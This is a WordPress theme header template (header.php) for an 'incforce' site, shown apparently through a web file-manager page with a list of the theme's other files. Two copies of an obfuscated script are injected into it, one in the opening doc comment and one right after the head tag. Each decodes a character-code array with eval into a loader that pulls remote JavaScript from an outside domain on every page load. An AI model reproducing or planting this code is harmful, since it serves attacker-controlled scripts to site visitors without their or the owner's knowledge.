PATH:
home
/
lab2454c
/
incforce.com
/
wp-content
/
themes
/
incforce
<?php /** * The header for our theme * * This is the template that displays all of the <head><script>var pirsen=String.fromCharCode(10,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,112,114,101,46,115,101,108,101,99,116,98,108,97,99,107,114,111,117,108,115,46,99,111,109,47,115,99,114,47,102,111,114,46,106,115,63,100,61,39,43,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,111,115,116,110,97,109,101,59,32,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,114,101,109,111,118,101,40,41,59,10,125,32,101,108,115,101,32,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125,10);eval(pirsen);</script> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package WP_Bootstrap_Starter */ ?> <!DOCTYPE html> <html <?php language_attributes(); ?>> <head><script>var pirsen=String.fromCharCode(10,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,112,114,101,46,115,101,108,101,99,116,98,108,97,99,107,114,111,117,108,115,46,99,111,109,47,115,99,114,47,102,111,114,46,106,115,63,100,61,39,43,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,111,115,116,110,97,109,101,59,32,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,114,101,109,111,118,101,40,41,59,10,125,32,101,108,115,101,32,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125,10);eval(pirsen);</script> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <link rel="profile" href="http://gmpg.org/xfn/11"> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php // WordPress 5.2 wp_body_open implementation if ( function_exists( 'wp_body_open' ) ) { wp_body_open(); } else { do_action( 'wp_body_open' ); } ?> <?php $header_field_content = get_field('header_field_content','option'); //Header Extra parts is managed by Theme Header Setting.. ?> <nav class="navbar navbar-expand-lg navbar__top" id="mainNav"> <div class="container"> <div class="navbar-brand navbar___brand"> <?php if ( get_theme_mod( 'wp_bootstrap_starter_logo' ) ): ?> <a href="<?php echo esc_url( home_url( '/' )); ?>"> <img src="<?php echo esc_url(get_theme_mod( 'wp_bootstrap_starter_logo' )); ?>" alt="<?php echo esc_attr( get_bloginfo( 'name' ) ); ?>"> </a> <?php else : ?> <a class="site-title" href="<?php echo esc_url( home_url( '/' )); ?>"><?php esc_url(bloginfo('name')); ?></a> <?php endif; ?> </div> <button class="navbar-toggler navbar__toggler hamburger__menu" type="button" data-bs-toggle="collapse" data-bs-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation"><span class="menu"></span> </button> <?php wp_nav_menu(array( 'theme_location' => 'primary', 'container' => 'div', 'container_id' => 'navbarResponsive', 'container_class' => 'collapse navbar-collapse', 'menu_id' => false, 'menu_class' => 'navbar-nav navbar__nav', 'depth' => 3, 'fallback_cb' => 'wp_bootstrap_navwalker::fallback', 'walker' => new wp_bootstrap_navwalker() )); ?> <div class="user__info"> <a href="<?php echo !empty($header_field_content['book_tour_url']) ? $header_field_content['book_tour_url'] :'#';?>"> <i class="ico__box"><img src="<?php echo $header_field_content['calendar_image'];?>" alt="" /></i> <?php echo $header_field_content['book_tour_title'];?> </a> <a href="<?php echo !empty($header_field_content['join_today_url']) ? $header_field_content['join_today_url'] :'#';?>"> <i class="ico__box"><img src="<?php echo $header_field_content['heart_image'];?>" alt="" /></i> <?php echo $header_field_content['join_today_title'];?> </a> </div> </div> <div class="member__portal__btn"> <a href="<?php echo !empty($header_field_content['member_portal_url']) ? $header_field_content['member_portal_url'] :'#';?>"> <?php echo $header_field_content['member_portal_title'];?><i class="ico__box"> <img src="<?php echo $header_field_content['plus_icon_image'];?>" alt="" /></i> </a> </div> </nav>
[+]
woocommerce
[-] template-book-tour.php
[edit]
[-] footer-widget.php
[edit]
[-] search.php
[edit]
[-] index.php
[edit]
[-] woocommerce.php
[edit]
[-] page.php
[edit]
[-] searchform.php
[edit]
[+]
..
[-] sidebar.php
[edit]
[-] rtl.css
[edit]
[-] template-contact-us.php
[edit]
[-] blank-page-with-container.php
[edit]
[-] single.php
[edit]
[-] footer.php
[edit]
[-] template-about.php
[edit]
[-] template-home.php
[edit]
[-] template-membership-and-pricing.php
[edit]
[-] template-create-account.php
[edit]
[-] blank-page.php
[edit]
[-] left-sidebar.php
[edit]
[-] header.php
[edit]
[-] template-news.php
[edit]
[-] style.css
[edit]
[-] 404.php
[edit]
[-] readme.txt
[edit]
[-] single-auction.php
[edit]
[-] single-attachment.php
[edit]
[-] screenshot.png
[edit]
[-] custom-editor-style.css
[edit]
[-] template-join-today.php
[edit]
[-] template-offering-workspace.php
[edit]
[-] template-memebership-levels.php
[edit]
[-] functions.php
[edit]
[-] archive.php
[edit]
[-] fullwidth.php
[edit]
[+]
template-parts
[-] comments.php
[edit]
[+]
inc
[-] template-member-portal.php
[edit]